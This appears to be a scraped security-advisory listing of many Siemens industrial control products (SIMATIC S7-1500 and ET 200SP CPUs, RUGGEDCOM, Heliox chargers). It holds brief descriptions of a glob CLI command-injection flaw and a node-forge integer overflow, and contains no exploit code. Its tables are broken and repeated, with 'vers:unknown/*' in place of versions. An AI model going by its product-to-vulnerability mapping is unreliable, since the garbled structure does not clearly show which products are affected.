Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
The glob CLI has a command injection vulnerability in its `-c/--cmd` option, allowing arbitrary command execution through malicious filenames, which has been patched in versions 10.5.0 and 11.1.0.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
An Integer Overflow vulnerability in node-forge versions up to 1.3.1 allows remote attackers to craft ASN.1 OIDs with oversized arcs that bypass security controls via 32-bit truncation, fixed in version 1.3.2.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
